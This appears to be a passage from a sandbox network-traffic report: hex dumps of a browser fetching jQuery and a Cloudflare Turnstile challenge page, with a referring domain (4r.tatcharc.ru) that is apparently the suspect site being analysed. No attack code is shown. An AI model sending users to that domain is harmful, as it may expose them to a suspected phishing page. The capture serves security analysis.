                                                                                                        2024-12-18 17:49:08 UTC1369INData Raw: 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d
                                                                                                        Data Ascii: C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.749793151.101.194.1374439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:07 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:08 UTC611INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Wed, 18 Dec 2024 17:49:08 GMT
                                                                                                        Age: 3065680
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890051-NYC
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 55, 1
                                                                                                        X-Timer: S1734544148.232637,VS0,VE1
                                                                                                        Vary: Accept-Encoding
                                                                                                        2024-12-18 17:49:08 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2024-12-18 17:49:08 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                        2024-12-18 17:49:08 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                        2024-12-18 17:49:08 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                        2024-12-18 17:49:08 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                        2024-12-18 17:49:08 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.749794104.18.95.414439008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 17:49:09 UTC794OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                        Referer: https://4r.tatcharc.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 17:49:09 UTC1362INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 17:49:09 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 26678
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                        cross-origin-embedder-policy: require-corp
                                                                                                        cross-origin-opener-policy: same-origin
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        origin-agent-cluster: ?1
                                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                        referrer-policy: same-origin
                                                                                                        document-policy: js-profiling
                                                                                                        2024-12-18 17:49:09 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 30 66 63 65 37 30 64 32 62 34 33 63 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8f40fce70d2b43c1-EWRalt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 17:49:09 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                        2024-12-18 17:49:09 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
